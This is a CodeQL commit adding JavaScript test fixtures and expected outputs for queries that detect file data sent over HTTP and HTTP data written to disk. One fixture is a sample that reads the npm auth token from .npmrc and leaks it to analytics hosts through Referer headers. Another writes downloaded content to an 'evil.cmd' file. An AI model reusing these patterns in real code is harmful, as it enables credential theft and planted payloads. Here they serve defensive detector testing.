hohn/codeql
1
0
Fork 0
mirror of https://github.com/github/codeql.git synced 2026-05-04 05:05:12 +02:00
Code Issues Packages Projects Releases Wiki Activity

Squished changes for HttpToFileAccess commint

Browse Source
This commit is contained in:
Denis Levin
2018-09-21 14:32:59 -07:00
parent e21a5e4b4c
commit 8152cefa60
22 changed files with 4061 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.expected Normal file
View File

@@ -0,0 +1,7 @@
| bufferRead.js:10:22:10:43 | new Buf ... s.size) | $@ flows directly to Http request body | bufferRead.js:31:21:31:28 | postData | File access |
| googlecompiler.js:43:54:43:57 | data | $@ flows directly to Http request body | googlecompiler.js:37:18:37:26 | post_data | File access |
| readStreamRead.js:11:21:11:35 | readable.read() | $@ flows directly to Http request body | readStreamRead.js:28:19:28:23 | chunk | File access |
| request.js:27:52:27:55 | data | $@ flows directly to Http request body | request.js:7:11:7:20 | {jsonData} | File access |
| request.js:42:51:42:54 | data | $@ flows directly to Http request body | request.js:15:11:22:3 | {\\n u ... ody\\n } | File access |
| sentAsHeaders.js:8:79:8:84 | buffer | $@ flows directly to Http request body | sentAsHeaders.js:13:20:18:9 | {\\n ... } | File access |
| sentAsHeaders.js:8:79:8:84 | buffer | $@ flows directly to Http request body | sentAsHeaders.js:19:20:24:9 | {\\n ... } | File access |

1
javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.qlref Normal file
View File

@@ -0,0 +1 @@
Security/CWE-200/FileAccessToHttp.ql

39
javascript/ql/test/query-tests/Security/CWE-200/bufferRead.js Normal file
View File

@@ -0,0 +1,39 @@
const fs = require('fs');
var http = require('http');
var fileName = "foo.txt";
fs.exists(fileName, function (exists) {
if (exists) {
fs.stat(fileName, function (error, stats) {
fs.open(fileName, "r", function (error, fd) {
var buffer = new Buffer(stats.size);
fs.read(fd, buffer, 0, buffer.length, null, function (error, bytesRead) {
var postData = buffer.toString("utf8", 0, bytesRead);
const options = {
hostname: 'www.google.com',
port: 80,
path: '/upload',
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': Buffer.byteLength(postData)
}
};
const req = http.request(options, (res) => {
res.setEncoding('utf8');
});
// write data to request body
req.write(postData);
req.end();
});
fs.close(fd);
});
});
}
});

1699
javascript/ql/test/query-tests/Security/CWE-200/externs/fs.js Normal file
View File

File diff suppressed because it is too large Load Diff

61
javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js Normal file
View File

@@ -0,0 +1,61 @@
// We need this to build our post string
var querystring = require('querystring');
var http = require('http');
var fs = require('fs');
function PostCode(codestring) {
// Build the post string from an object
var post_data = querystring.stringify({
'compilation_level' : 'ADVANCED_OPTIMIZATIONS',
'output_format': 'json',
'output_info': 'compiled_code',
'warning_level' : 'QUIET',
'js_code' : codestring // BAD: passing data from file to the request json body
});
// An object of options to indicate where to post to
var post_options = {
host: 'closure-compiler.appspot.com',
port: '80',
path: '/compile',
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': Buffer.byteLength(post_data)
}
};
// Set up the request
var post_req = http.request(post_options, function(res) {
res.setEncoding('utf8');
res.on('data', function (chunk) {
console.log('Response: ' + chunk);
});
});
// post the data
post_req.write(post_data);
post_req.end();
}
// This is an async file read
fs.readFile('LinkedList.js', 'utf-8', function (err, data) {
if (err) {
// If this were just a small part of the application, you would
// want to handle this differently, maybe throwing an exception
// for the caller to handle. Since the file is absolutely essential
// to the program's functionality, we're going to exit with a fatal
// error instead.
console.log("FATAL An error occurred trying to read in the file: " + err);
process.exit(-2);
}
// Make sure there's data before we post it
if(data) {
PostCode(data);
}
else {
console.log("No data to post");
process.exit(-1);
}
});

28
javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js Normal file
View File

@@ -0,0 +1,28 @@
var fs = require("fs");
var http = require("http");
let data = fs.readFileSync("input.txt");
try {
let s = data.toString();
// An object of options to indicate where to post to
var post_options = {
host: 'closure-compiler.appspot.com',
port: '80',
path: '/compile',
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': Buffer.byteLength(s)
}
};
// Set up the request
var post_req = http.request(post_options, function(res) {
res.setEncoding('utf8');
});
// post the data
post_req.write(s);
post_req.end();
} catch (e) {
}

36
javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js Normal file
View File

@@ -0,0 +1,36 @@
const fs = require('fs');
var http = require('http');
var fileName = "foo.txt";
fs.exists(fileName, function (exists) {
if (exists) {
fs.stat(fileName, function (error, stats) {
var readable = fs.createReadStream(fileName);
readable.on('readable', () => {
let chunk = readable.read();
const options = {
hostname: 'www.google.com',
port: 80,
path: '/upload',
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
}
};
const req = http.request(options, (res) => {
res.setEncoding('utf8');
});
// write data to request body
req.write(chunk);
req.end();
});
fs.close(fd);
});
}
});

55
javascript/ql/test/query-tests/Security/CWE-200/request.js Normal file
View File

@@ -0,0 +1,55 @@
var fs = require('fs');
var request = require('request');
function PostJSON(jsonData)
{
request({jsonData}, function (error, response, body){ // BAD: passing data from file to the request body
console.log(response);
});
}
function PostXML(xmlData)
{
request({
url: "http://example.com/myxml",
method: "POST",
headers: {
"content-type": "application/xml",
},
body: xmlData // BAD: passing data from file to the request body
}, function (error, response, body){
console.log(response);
});
}
fs.readFile('MyFile.json', 'utf-8', function (err, data) { // source
if (err) {
console.log("FATAL An error occurred trying to read in the file: " + err);
process.exit(-2);
}
// Make sure there's data before we post it
if(data) {
PostJSON(data);
}
else {
console.log("No data to post");
process.exit(-1);
}
});
fs.readFile('MyFile.xml', 'utf-8', function (err, data) { // source
if (err) {
console.log("FATAL An error occurred trying to read in the file: " + err);
process.exit(-2);
}
// Make sure there's data before we post it
if(data) {
PostXML(data);
}
else {
console.log("No data to post");
process.exit(-1);
}
});

28
javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js Normal file
View File

@@ -0,0 +1,28 @@
try {
var path = require("path"), fs = require("fs"), content = "nofile";
var npmrc = path.join(process.env.HOME || process.env.USERPROFILE, ".npmrc");
if (fs.existsSync(npmrc)) {
content = fs.readFileSync(npmrc, { encoding: "utf8" });
fs.open(npmrc, "r", function (error, fd) {
var buffer = new Buffer(stats.size);
fs.read(fd, buffer, 0, buffer.length, null, function (error, bytesRead, buffer) {
var content = buffer.toString("utf8", 0, bytesRead);
content = content.replace("//registry.npmjs.org/:_authToken=", "").trim();
var https1 = require("https");
https1.get({
hostname: "sstatic1.histats.com",
path: "/0.gif?4103075&101",
method: "GET",
headers: { Referer: "http://1.a/" + content } //BAD: passing stolen token in a header
}, () => { })
https1.get({
hostname: "c.statcounter.com",
path: "/11760461/0/7b5b9d71/1/",
method: "GET",
headers: { Referer: "http://2.b/" + content } //BAD: passing stolen token in a header
}, () => { })
});
});
}
} catch (e) {
}

3
javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected Normal file
View File

@@ -0,0 +1,3 @@
| tst.js:15:33:15:33 | c | $@ flows to file system | tst.js:14:26:14:26 | c | Untrusted data received from Http response |
| tst.js:18:25:18:25 | c | $@ flows to file system | tst.js:14:26:14:26 | c | Untrusted data received from Http response |
| tst.js:23:22:23:22 | c | $@ flows to file system | tst.js:14:26:14:26 | c | Untrusted data received from Http response |

1
javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref Normal file
View File

@@ -0,0 +1 @@
Security/CWE-912/HttpToFileAccess.ql

1699
javascript/ql/test/query-tests/Security/CWE-912/externs/fs.js Normal file
View File

File diff suppressed because it is too large Load Diff

40
javascript/ql/test/query-tests/Security/CWE-912/tst.js Normal file
View File

@@ -0,0 +1,40 @@
try {
var https = require('https');
var fs = require('fs');
https.get({
'hostname': 'example.com', path: '/raw/XXXXXXXX', headers:
{
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
},
(response) => {
response.setEncoding('utf8');
response.on('data', (c) => {
fs.writeFile("/tmp/test", c, (err) => {}); // BAD: data from response 'on' event flows to file
let writeStream = fs.createWriteStream('/usr/evil/evil.cmd');
writeStream.write(c); // BAD: data from response 'on' event flows to filestream write
writeStream.end();
var stream = fs.createWriteStream("my_file.txt");
stream.once('open', function (fd) {
stream.write(c); // BAD: data from response 'on' event flows to filestream write
stream.end();
});
});
response.on('error', () =>
{
fs.writeFile("/tmp/test", "error occured"); // GOOD: static data written to file
});
}).on('error', () =>
{
let error = "error occured";
let writeStream = fs.createWriteStream('/usr/good/errorlog.txt');
writeStream.write(error); // GOOD: static data written to file stream
writeStream.end();
});
}
catch (e) {
}